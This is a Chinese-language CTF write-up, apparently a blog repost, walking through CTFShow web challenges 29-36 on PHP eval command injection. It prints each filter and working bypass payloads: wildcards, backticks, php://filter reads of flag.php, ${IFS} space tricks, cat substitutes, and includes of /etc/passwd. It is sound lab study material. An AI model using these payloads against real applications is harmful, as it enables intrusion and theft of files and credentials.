2. 程式人生 > 實用技巧 >CTFShow-Web入門-命令執行 29-36

CTFShow-Web入門-命令執行 29-36

阿新 發佈:2020-10-21

web29

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

過濾了 flag

①使用萬用字元

payload1:?c = system('cat f*');

payload2:?c = system('cat fla/g.php');

②利用eval函式

傳入:?c = echo "ss";?>ctf <?php system('ls');

看到有flag檔案,payload3:?c = echo "ss";?>ctf <?php include($_GET['url']);&url=php://filter/read=convert.base64-encode/resource=flag.php

web30

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file
 
(__FILE__);
}

過濾了 命令執行函式

命令執行函式如下

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
反引號 同shell_exec()

①利用反引號

payload1:?c = echo `fl*`;

②同上

payload2:?c = echo "ss";?>ctf <?php include($_GET['url']);&url=php://filter/read=convert.base64-encode/resource=flag.php

web31

error_reporting
 
(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

過濾空格,單引號,cat等

空格繞過

> < <> 重定向符
%09(需要php環境)
${IFS}
$IFS$9
{cat,flag.php} //用逗號實現了空格功能
%20
%09

cat繞過

more:一頁一頁的顯示檔案內容
less:與 more 類似
head:檢視頭幾行
tac:從最後一行開始顯示,可以看出 tac 是 cat 的反向顯示
tail:檢視尾幾行
nl:顯示的時候,順便輸出行號
od:以二進位制的方式讀取檔案內容
vi:一種編輯器,這個也可以檢視
vim:一種編輯器,這個也可以檢視
sort:可以檢視
uniq:可以檢視
file -f:報錯出具體內容

payload1: ?c=echo(tac%90f*);

②雙引號替換單引號

payload2: ?c=include($_GET["url"]);?>&url=php://filter/read=convert.base64-encode/resource=flag.php

web32

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

無需括號的函式

echo 666;
print 666;
die;
include "/etc/passwd";
require "/etc/passwd";
include_once "/etc/passwd";
require_once "/etc/passwd";

繞過分號

?>

payload1:?c=include$_POST[1]?>

1=php://filter/read=convert.base64-encode/resource=flag.php

web33

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

過濾了雙引號

payload 同32

web34

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

過濾了冒號

payload 同32

web35

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

過濾了 雙引號 < =

payload 同32

web36

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

過濾了 反斜槓 和 數字

把數字 1 改成 字母 a

payload1:?c=include$_POST[a]?>

a=php://filter/read=convert.base64-encode/resource=flag.php

相關推薦

CTFShow-Web入門-命令執行 29-36

web29 error_reporting(0); if(isset($_GET[\'c\'])){ $c = $_GET[\'c\']; if(!preg_match(\"/flag/i\", $c)){ eval($c);

CTFShow-Web入門-命令執行 37-49

data:// 用法:data://text/plain;base64, web37 error_reporting(0); if(isset($_GET[\'c\'])){ $c = $_GET[\'c\'];

CTFShow-Web入門-命令執行 71-74

web71 payload:c=include(\"/flag.txt\");exit(); 執行完前面的包含語句後會強制退出,不會執行後面的語句

ctfshow web入門 - 命令執行(50)

if(isset($_GET[\'c\'])){ $c=$_GET[\'c\']; if(!preg_match(\"/\\;|cat|flag| |[0-9]|\\\\$|\\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\\`|\\%|\\x09|\\x26/i\", $c)){

ctfshow WEB入門 命令執行 web29-web122

web29 題目原始碼: if(isset($_GET[\'c\'])){ $c = $_GET[\'c\']; if(!preg_match(\"/flag/i\", $c)){ eval($c);

ctf_show-web入門-命令執行(29-39)

WEB29 正則表示式過濾了flag 首先先看看有什麼檔案,?c=system(ls); 看到了 flag.php 用*來輸出,?c=system(\'cat fla*\');

ctfshow-web入門命令執行-web40/web41(附python指令碼)

web40 別看這裡過濾了這麼多,其實他過濾的括號是中文括號,這裡我開始納悶了好久

ctfshow web入門 命令執行

web32 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date:2020-09-04 00:12:34 # @Last Modified by:h1xa

ctf show--web 入門 命令執行篇部分題解

技術標籤:ctf 最近和朋友一起入了ctf show的坑,在這裡記錄一下刷題過程以及從大佬那裡學到的姿勢。

ctf_show-web入門-命令執行(42-53)

WEB42 >是寫入 而1和2意思百度一下: 那麼就是不管標準輸出還是錯誤輸出都輸入到null裡銷燬

ctf_show-web入門-命令執行(118-124)

web-118 測試了一下發現數字和字母過濾了,第一反應是無符號rce,發現走不通。

ctfshow Web入門 40 - 命令執行(10)

題目過濾如下: 先檢視當前目錄下面有啥檔案 參考了羽大佬的WP:https://blog.csdn.net/miuzzx/article/details/108415301

CTFshow web入門 (php特性)

web 89 <?php include(\"flag.php\"); highlight_file(__FILE__); if(isset($_GET[\'num\'])){ $num = $_GET[\'num\'];

Ctfshow Web入門 - 檔案包含總結

1.普通檔案包含 常見的php偽協議大致四種 1.php://filter主要用於讀取原始碼 2.php://input經常使用file_get_contents獲取php://input內容

Ctfshow Web入門 - PHP特性(待續)

Web89 include(\"flag.php\"); highlight_file(__FILE__); if(isset($_GET[\'num\'])){ $num = $_GET[\'num\']; if(preg_match(\"/[0-9]/\", $num)){

ctfshow web入門 web57

膜 看wp分析一波 只要湊出36即可 0x01 shell中各種括號()、(())、[]、[[]]、{}的作用和區別 : https://blog.csdn.net/qq_46091464/article/details/108563368

ctfshow web入門 反序列化

技術標籤:CTFwebphp 文章目錄 web254web255web256web257web258web259web260 web254 <?php error_reporting(0);

CTFshow-WEB入門-反序列化(持續更新)

技術標籤:序列化和反序列化PHP反序列化web安全 前言 簡單的反序列化直接給出payload,有意思的,較為複雜的和我不太會的會分析一波。

CTFSHOW WEB入門 PHP特性篇

web89 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date:2020-09-16 11:25:09 # @Last Modified by:h1xa

ctfshow web入門資訊收集

資訊收集 web1 檢視原始碼: 1.右鍵,檢視原始碼 2.view-source:url web2 view-source:url檢視原始碼